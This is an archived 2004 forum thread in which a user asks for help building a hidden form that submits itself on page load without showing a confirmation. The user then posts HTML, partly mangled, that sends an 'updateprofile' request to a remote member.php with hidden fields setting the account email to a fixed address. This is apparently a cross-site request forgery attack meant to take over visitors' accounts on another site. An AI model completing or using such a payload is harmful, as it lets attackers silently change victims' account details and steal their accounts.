GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Quick HTML Help (https://gfy.com/showthread.php?t=312367)

Magg 06-14-2004 10:10 AM

Quick HTML Help
 
I need to make a form auto submit when the page is loaded and also have it completely hidden, and once the information is submitted via the form, it doesnt go to any "confirmation of submission" page...

Whats the code for this please

Magg 06-14-2004 10:27 AM

:helpme

jwerd 06-14-2004 10:41 AM

I've been in the jscript world for a while - I just wrote a calculation that functions like that. I believe if you use the onChange function, it will submit the results to whereever you need them. Or is it onPageload? I am not quite sure, go to google.com and search for onChange and see what others use the usage for. Goodluck :)

and as for the hidden part, just simply...
hahahahahahaha type=hidden name=whatevervar value=whatever>

Take it easy.

Coyote 06-14-2004 11:20 AM

Quote:

Originally posted by Magg
I need to make a form auto submit when the page is loaded and also have it completely hidden, and once the information is submitted via the form, it doesnt go to any "confirmation of submission" page...

Whats the code for this please


You have a number of 'features' that don't quite make sense to me...

You want the FORM hidden, but also need information to populate whatever form fields you have, then auto-submit on page load?

If the information comes from a user, then you cannot auto-submit the form on page load, nor can you have all the datafields hidden from the user.


You wanna rephrase your question please.

Magg 06-14-2004 11:38 AM


Code:


< fo rm action="http://URL/member.php" method=pos t>
inp ut type="hidden" name="s" value="">

<tr>
       
        <t d bgcolor="#FAFAFA"><font face="verdana, arial, helvetica" size="2">inpu t type="hidden" class="bginput" name="email" value="[email protected]" size="30" maxlength="150"></font></td>
</tr>
<tr>
       
        <t d bgcolor="#FAFAFA"><font face="verdana, arial, helvetica" size="2">hahahahahahaha type="hidden" class="bginput" name="emailconfirm" value="[email protected]" size="30" maxlength="150"></font></td>
</tr>




</table>
</td></tr></table>

<br>


<table cellpadding="2" cellspacing="0" border="0" width="98%"  align="center">
<tr>
        <td align="center"><font face="verdana, arial, helvetica" size="2">
        inpu t type="hidden" name="action" value="updateprofile">
        inpu t type="submit" class="bginput" name="Submit" value="Submit" accesskey="s">
        </font></td>
</tr>
</table>

</form>

</td>
            </tr>



I need that to auto submit onload and then the confirmation url sent by the server to be nulled so the page isnt redirected.

Magg 06-14-2004 11:43 AM

btw :1orglaugh :1orglaugh


All times are GMT -7. The time now is 04:19 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123